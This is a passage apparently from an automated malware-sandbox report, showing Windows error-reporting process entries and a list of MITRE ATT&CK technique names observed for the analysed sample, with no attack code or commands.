  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2568 -ip 2568
PID 3936, depth 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5200 -ip 5200
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter (1)
PowerShell (1)
Scheduled Task/Job (1)
Scheduled Task (1)
Defense Evasion
Modify Registry (1)
Subvert Trust Controls (1)
Install Root Certificate (1)
Downloads